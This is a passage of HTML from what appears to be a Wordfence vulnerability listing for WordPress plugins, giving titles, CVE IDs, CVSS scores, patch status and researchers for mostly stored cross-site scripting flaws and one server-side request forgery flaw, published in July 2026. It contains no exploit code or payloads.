<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/841e999a-3501-4295-bfea-8027a5ed3308" target="_blank" rel="noopener">BSK PDF Manager &lt;= 3.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65528" target="_blank" rel="noopener noreferrer">							CVE-2026-65528						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bsk-pdf-manager" target="_blank" rel="noopener">BSK PDF Manager</a> <span class="wfvr-software-slug">[bsk-pdf-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/841e999a-3501-4295-bfea-8027a5ed3308" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6720e68e-16fc-48c2-ad56-1f44a3e78bb2" target="_blank" rel="noopener">Bulk Page Generator &lt;= 2.5.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Post Title</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15404" target="_blank" rel="noopener noreferrer">							CVE-2026-15404						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lpagery" target="_blank" rel="noopener">Bulk Page Generator – LPagery</a> <span class="wfvr-software-slug">[lpagery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6720e68e-16fc-48c2-ad56-1f44a3e78bb2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b4178d1-e54d-4902-933d-49f9d4400b0e" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent &lt;= 7.5.1 &#8211; Authenticated (Author+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65496" target="_blank" rel="noopener noreferrer">							CVE-2026-65496						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/complianz-gdpr" target="_blank" rel="noopener">Complianz – GDPR/CCPA Cookie Consent</a> <span class="wfvr-software-slug">[complianz-gdpr]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b4178d1-e54d-4902-933d-49f9d4400b0e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0cc9cad8-0e2f-4ecf-9ca7-15ca060879c1" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;cozyCustomFont&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15333" target="_blank" rel="noopener noreferrer">							CVE-2026-15333						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 600+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0cc9cad8-0e2f-4ecf-9ca7-15ca060879c1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2daddb7a-0ea7-4d11-8699-1982e336120f" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;icon.view&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15334" target="_blank" rel="noopener noreferrer">							CVE-2026-15334						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 600+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2daddb7a-0ea7-4d11-8699-1982e336120f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53880f49-a2f0-4864-ba85-8fbf06ea7833" target="_blank" rel="noopener">Custom links in Elementor Image Carousel &lt;= 1.1.1 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65534" target="_blank" rel="noopener noreferrer">							CVE-2026-65534						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-links-in-elementor-image-carousel" target="_blank" rel="noopener">Custom links in Elementor Image Carousel</a> <span class="wfvr-software-slug">[custom-links-in-elementor-image-carousel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53880f49-a2f0-4864-ba85-8fbf06ea7833" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c22f34f1-2df7-4ffc-b808-234ca9039404" target="_blank" rel="noopener">Equalize Digital Accessibility Checker &lt;= 1.46.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;html&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14481" target="_blank" rel="noopener noreferrer">							CVE-2026-14481						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/accessibility-checker" target="_blank" rel="noopener">Equalize Digital Accessibility Checker – WCAG, ADA, EAA and Section 508 compliance</a> <span class="wfvr-software-slug">[accessibility-checker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c22f34f1-2df7-4ffc-b808-234ca9039404" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2100d720-bfb4-451d-9907-e0b77ef507a5" target="_blank" rel="noopener">Essential Addons for Elementor &lt;= 6.6.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15145" target="_blank" rel="noopener noreferrer">							CVE-2026-15145						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e4a8b174c9f284d94094cf7722e1ec31.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4a8b174c9f284d94094cf7722e1ec31"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener">Asaf Mozes</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2100d720-bfb4-451d-9907-e0b77ef507a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dde0cf3a-778b-4b5f-ac0e-600505d918ae" target="_blank" rel="noopener">Essential Addons for Elementor &lt;= 6.6.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Reading Progress Global Color Settings</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15156" target="_blank" rel="noopener noreferrer">							CVE-2026-15156						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dde0cf3a-778b-4b5f-ac0e-600505d918ae" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8396c124-9c72-4801-8964-1cd5fbd52d20" target="_blank" rel="noopener">Firelight Lightbox &lt;= 2.3.20 &#8211; Authenticated (Contributor+) Stored DOM Cross-Site Scripting via PDF beforeLoad &#8216;href&#8217; Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6454" target="_blank" rel="noopener noreferrer">							CVE-2026-6454						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-fancybox" target="_blank" rel="noopener">Firelight Lightbox</a> <span class="wfvr-software-slug">[easy-fancybox]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cb9373b67e4240c01c77d2af2ea71179.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb9373b67e4240c01c77d2af2ea71179"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener">Quốc Huy (jtwings)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8396c124-9c72-4801-8964-1cd5fbd52d20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b192a54-fe49-4bdf-bd91-0e88eb228cc4" target="_blank" rel="noopener">Fluent Support – Helpdesk &amp; Customer Support Ticket System &lt;= 2.3.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65470" target="_blank" rel="noopener noreferrer">							CVE-2026-65470						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support" target="_blank" rel="noopener">Fluent Support – Helpdesk &amp; Customer Support Ticket System</a> <span class="wfvr-software-slug">[fluent-support]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b192a54-fe49-4bdf-bd91-0e88eb228cc4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c963224-e680-4ca6-85ae-07cd0ee6c1d4" target="_blank" rel="noopener">Fluent Support &lt;= 2.3.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;redirect-to&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15665" target="_blank" rel="noopener noreferrer">							CVE-2026-15665						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-support" target="_blank" rel="noopener">Fluent Support – Helpdesk &amp; Customer Support Ticket System</a> <span class="wfvr-software-slug">[fluent-support]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0c963224-e680-4ca6-85ae-07cd0ee6c1d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c4498d0a-32f2-4747-88bd-0f85312b4653" target="_blank" rel="noopener">Grid/List View for WooCommerce &lt;= 3.0.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;position&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15794" target="_blank" rel="noopener noreferrer">							CVE-2026-15794						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gridlist-view-for-woocommerce" target="_blank" rel="noopener">Grid/List View for WooCommerce</a> <span class="wfvr-software-slug">[gridlist-view-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c4498d0a-32f2-4747-88bd-0f85312b4653" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9e2cc3b5-8eb7-42ef-be25-f778560b6e58" target="_blank" rel="noopener">HashThemes Demo Importer &lt;= 1.4.2 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65483" target="_blank" rel="noopener noreferrer">							CVE-2026-65483						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hashthemes-demo-importer" target="_blank" rel="noopener">HashThemes Demo Importer</a> <span class="wfvr-software-slug">[hashthemes-demo-importer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
